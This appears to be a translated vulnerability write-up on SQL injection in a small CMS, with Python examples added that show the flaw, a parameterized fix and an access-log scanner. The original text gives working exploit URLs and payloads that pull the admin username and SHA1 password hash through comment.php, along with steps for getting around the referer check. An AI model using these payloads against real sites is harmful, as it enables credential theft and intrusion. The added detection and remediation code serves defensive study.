There is no technical error in the article! I looked at this program because I used to use it on Tusi to demonstrate how vulnerability hunting works, but I did not find any vulnerability at the time. I only looked at three places: one is the injection in the content.php file, another is the injection in comment.php, and there also seems to be a forged User-Agent injection in the backend login. Those interested can check it themselves.
1. content.php blind injection (low value):
Line 3:
There is no filtering here, but I don't know how to exploit it well, and it is a bit troublesome. First post an article (you must register as a member).
Then change the name of the original password form field directly to content_link[x].
Then submit directly: 1', (select 1234567890) #   (gpc can be ignored; think about why)
The INSERT then closes the value and becomes:
insert into `x_content_link` (`link_url`, `content_id`) values ('1', (select 1234567890) #', '22')
However, once it is inserted into the database I could not find where it is echoed for a long time, and I don't know how to make use of it, so the injection is very weak; you also need publishing permission, so... ignore it ~~
2. comment.php injection (instant kill)
Line 27:
There are two problems here too. One is that the author may have forgotten about comment_content: only a trim() removes leading and trailing whitespace, with no other filtering ~~
Then $_SERVER['HTTP_USER_AGENT'] is assigned to comment_agent, which can be forged ~~~
So... there are actually two injections, but since $_SERVER['HTTP_USER_AGENT'] still has to be forged, we will demonstrate the injection at comment_content directly ~~
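Both injections in this write-up (the content_link[x] field in content.php and comment_content / the User-Agent header in comment.php) come down to the same defect: user-controlled text is spliced into an INSERT string, so a single quote ends the value and whatever follows runs as SQL, including a sub-select whose result is written into a column the site later displays. The Python/sqlite3 script below is an added example written for this page, not code from the CMS or from the original author. The table and column names are assumptions (only the x_ prefix comes from the write-up), and the MySQL concat()/# syntax is rendered with SQLite's || and -- equivalents. It shows that trim() leaves the payload intact when the query is concatenated, and that bound parameters store the same payload as inert text.

```python
import sqlite3

# Constructed in-memory schema. The x_ prefix follows the write-up; every table and
# column name here is an assumption for the demo, not taken from the CMS.
SCHEMA = """
CREATE TABLE x_admin (admin_name TEXT, admin_password TEXT);
CREATE TABLE x_comment (comment_content TEXT, comment_agent TEXT,
                        content_id TEXT, comment_status TEXT);
INSERT INTO x_admin VALUES ('admin', 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3');
"""
# The stored value above is sha1('test'), constructed for the demo.

# SQLite form of the write-up's sub-select: concat(0x5E24, a, 0x3A, b, 0x245E)
# becomes '^$' || a || ':' || b || '$^', and the MySQL '#' terminator becomes '--'.
LEAK_SUBSELECT = ("(SELECT '^$' || admin_name || ':' || admin_password || '$^' "
                  "FROM x_admin LIMIT 1)")


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_insert(conn, comment_content, user_agent, content_id):
    """The pattern the write-up describes: trim() the comment, then splice both the
    comment and the User-Agent header straight into the INSERT text."""
    content = comment_content.strip()  # trim() removes whitespace; it escapes nothing
    sql = ("INSERT INTO x_comment (comment_content, comment_agent, content_id, comment_status) "
           f"VALUES ('{content}', '{user_agent}', '{content_id}', '1')")
    conn.execute(sql)
    return conn.execute("SELECT * FROM x_comment ORDER BY rowid DESC LIMIT 1").fetchone()


def safe_insert(conn, comment_content, user_agent, content_id):
    """Same insert with bound parameters: values travel separately from the statement
    text, so quotes, sub-selects and comment markers are stored as plain strings."""
    conn.execute(
        "INSERT INTO x_comment (comment_content, comment_agent, content_id, comment_status) "
        "VALUES (?, ?, ?, ?)",
        (comment_content.strip(), user_agent, str(content_id), "1"),
    )
    return conn.execute("SELECT * FROM x_comment ORDER BY rowid DESC LIMIT 1").fetchone()


# Payload in the comment_content position: close the string, supply the remaining
# values (one of them the sub-select) and comment out the original tail of the statement.
COMMENT_PAYLOAD = f"3', {LEAK_SUBSELECT}, '17', '1') -- "
# The same idea through the forged User-Agent header, which the write-up notes is
# equally unfiltered; here the sub-select lands in the last column.
AGENT_PAYLOAD = f"Mozilla', '17', {LEAK_SUBSELECT}) -- "


def demo():
    """Run each payload through both versions and return the stored rows."""
    conn = fresh_db()
    return {
        "vuln_comment": vulnerable_insert(conn, COMMENT_PAYLOAD, "Mozilla/5.0", 17),
        "vuln_agent": vulnerable_insert(conn, "nice post", AGENT_PAYLOAD, 17),
        "safe_comment": safe_insert(conn, COMMENT_PAYLOAD, "Mozilla/5.0", 17),
        "safe_agent": safe_insert(conn, "nice post", AGENT_PAYLOAD, 17),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:13} -> {row}")
```

In the two vulnerable rows the admin name and password hash appear in a comment column, which is exactly what the write-up reports seeing on the article page; in the two safe rows the payload text is stored verbatim and never reaches the parser. Whitelisting or escaping individual inputs is a weaker fix than parameter binding because, as the User-Agent case shows, every string that reaches the query is an input, not only the form fields.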
Because single quotes are filtered in the system's built-in AJAX comments on the article page, you cannot go through them directly, and the program additionally verifies requests with the check_request() function.
Therefore you cannot simply type the URL into the browser. Here is the exp first:
comment.php?action=content_comment_insert&content_id=[ID]&comment_authcode=[verification code]&comment_content=3',(select+concat(0x5E24,admin_name,0x3A,admin_password,0x245E)+from+[table name]+limit+0,1),",'1','[ID]',",")%23
The article ID used for testing is 17, and the admin table is x_admin (x_ is the default prefix; I am not sure about other versions...). So the exp is constructed as follows:
comment.php?action=content_comment_insert&content_id=17&comment_authcode=cdd&comment_content=3',(select+concat(0x5E24,admin_name,0x3A,admin_password,0x245E)+from+x_admin+limit+0,1),",'1','17',",")%23
Here comment_authcode=cdd is the verification code, which you can obtain by visiting the authcode.php file. If the verification code is abc, change it to comment_authcode=abc.
Then find a link on the homepage, change its href to the exp above, and click the link ~~~
Go to the article page and view the comments... the admin account and password are revealed (note: the password is a SHA1 hash).
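From the defending side, the request shape described in this section is easy to spot in web server access logs: a GET to comment.php whose comment_content parameter carries a quote followed by a comma, a SELECT ... FROM, hex literals and a comment terminator. The scanner below is an added example, not part of the original post or the CMS; the log lines are constructed (RFC 5737 documentation addresses) and the hint patterns are a starting point rather than a complete rule set. It URL-decodes every query parameter, counts how many independent injection indicators appear in each value, and raises an alert only when at least two coincide, so ordinary comments that happen to contain a quote are not flagged.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Common Log Format lines. The third carries the comment.php payload shape
# described above, percent-encoded the way a browser sends it (the '#' must be %23 or
# the browser would treat it as a fragment and never send it).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /comment.php?action=content_comment_insert&content_id=17&comment_authcode=cdd&comment_content=nice+post HTTP/1.1" 200 310
198.51.100.9 - - [01/Jan/2024:10:01:12 +0000] "GET /comment.php?action=content_comment_insert&content_id=17&comment_authcode=cdd&comment_content=3%27,(select+concat(0x5E24,admin_name,0x3A,admin_password,0x245E)+from+x_admin+limit+0,1),%27%27,%271%27,%2717%27,%27%27,%27%27)%23 HTTP/1.1" 200 310
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Independent indicators; each one alone is weak, several together are not.
SQLI_HINTS = [
    ("subselect", re.compile(r"\bselect\b.*\bfrom\b", re.I)),  # pulls from another table
    ("hex_literal", re.compile(r"0x[0-9a-f]{2,}", re.I)),        # MySQL hex strings avoiding quotes
    ("comment_terminator", re.compile(r"(#|--\s|/\*)")),          # discards the rest of the statement
    ("quote_break", re.compile(r"'\s*,")),                       # closes a value and starts the next
]


def suspicious_params(target):
    """Return (param, decoded_value, [hint names]) for every query parameter that
    matches at least one indicator."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            decoded = unquote_plus(value)  # second pass catches double-encoded payloads
            hits = [label for label, rx in SQLI_HINTS if rx.search(decoded)]
            if hits:
                findings.append((name, decoded, hits))
    return findings


def scan(log_text, min_hits=2):
    """Parse access-log lines and alert on parameters with at least min_hits indicators."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value, hits in suspicious_params(m["target"]):
            if len(hits) >= min_hits:
                alerts.append({
                    "ip": m["ip"], "time": m["ts"], "path": urlsplit(m["target"]).path,
                    "param": name, "hits": hits, "value": value,
                })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Because the exploit here is delivered by clicking a rewritten link on the site's own homepage, the Referer header looks legitimate and a referer-based rule such as check_request() offers no detection value; the payload content is the reliable signal. The same function can be pointed at the comment table itself, since a successful attempt leaves the leaked value stored in a comment row.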
Original: http://madman.in/madman5/492.htm   Vulnerability author: B1oods   Vulnerability source: French Forum